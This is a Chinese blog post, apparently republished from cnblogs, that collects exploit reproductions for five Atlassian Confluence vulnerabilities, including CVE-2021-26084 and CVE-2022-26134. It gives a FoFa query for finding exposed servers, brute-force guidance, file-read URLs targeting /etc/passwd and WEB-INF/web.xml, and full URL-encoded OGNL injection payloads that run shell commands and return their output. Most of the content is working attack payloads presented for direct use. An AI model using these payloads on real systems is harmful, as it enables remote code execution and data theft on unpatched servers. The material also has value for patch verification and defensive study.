ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

Atlassian Confluence漏洞复现合集

2022-08-10 21:05:02  阅读:219  来源: 互联网

标签:+% 29% 28% Atlassian Confluence 复现 5cu0022% 3b 3d


1 概述

Atlassian Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。。该软件可实现团队成员之间的协作和知识共享。

一共复现5个漏洞:暴力破解、CVE-2015-8399任意文件读取、CVE-2021-26084远程代码执行、CVE-2021-26085受限的文件读取、CVE-2022-26134 OGNL注入命令执行。

FoFa语法:app="ATLASSIAN-Confluence"

2详情

2.1暴力破解

Web界面如下,抓取登录数据包可进行用户名和密码进行穷举,状态码为302的暴破成功的。

2.2 CVE-2015-8399任意文件读取

Atlassian Confluence 5.8.17之前版本中存在安全,该漏洞源于spaces/viewdefaultdecorator.action和admin/viewdefaultdecorator.action两个文件没有充分过滤decoratorName参数。远程攻击者可利用该漏洞读取配置文件。

利用该漏洞需要登录系统

POC:http://www.xxx.com/spaces/viewdefaultdecorator.action?decoratorName=file:///etc/passwd

decoratorName=/WEB-INF/web.xml 读取配置文件。

decoratorName=/或.,可查看目录文件

decoratorName=文件名,可直接读取文件内容

2.3 CVE-2021-26084远程代码执行

CVE-2021-26084即是Atlassian Confluence OGNL表达式注入代码执行漏洞,版本小于7.13.0,有多个接口存在这个OGNL表达式注入漏洞,重点关注以下三个路径。

在无需登录的情况下,访问/pages/doenterpagevariables.action或/pages/createpage-entervariables.action,如果存在,说明存在该漏洞。在登录状态下(需要是管理员或有权限访问/admin/console.action),访问/pages/createpage.action,也可进行漏洞利用。

http://www.xxx.com/pages/doenterpagevariables.action

http://www.xxx.com /pages/createpage-entervariables.action

使用如下数据包进行再次验证漏洞

POST /pages/doenterpagevariables.action HTTP/1.1

queryString=%5cu0027%2b%7b2*233%7d%2b%5cu0027

使用如下数据包进行执行命令

queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022ifconfig%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027

可直接利用脚本进行执行命令

2.4 CVE-2021-26085受限的文件读取

/s/路径是Atlassian产品通用的访问静态资源的方式,Confluence有一个正则用于避免WEB-INF和META-INF目录下文件被读取,CVE-2021-26085可以通过url编码绕过这个正则,实现WEB-INF和META-INF目录下的文件读取。

POC:/s/随机字符/_/;/WEB-INF/web.xml

http://www.xxx.com/s/666/_/;/WEB-INF/web.xml

2.5 CVE-2022-26134 OGNL注入命令执行

Confluence OGNL 注入漏洞,查看返回数据包X-Cmd-Response字段内容

漏洞POC

/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/

可直接利用脚本进行执行命令

标签:+%,29%,28%,Atlassian,Confluence,复现,5cu0022%,3b,3d
来源: https://www.cnblogs.com/NoId/p/16573825.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有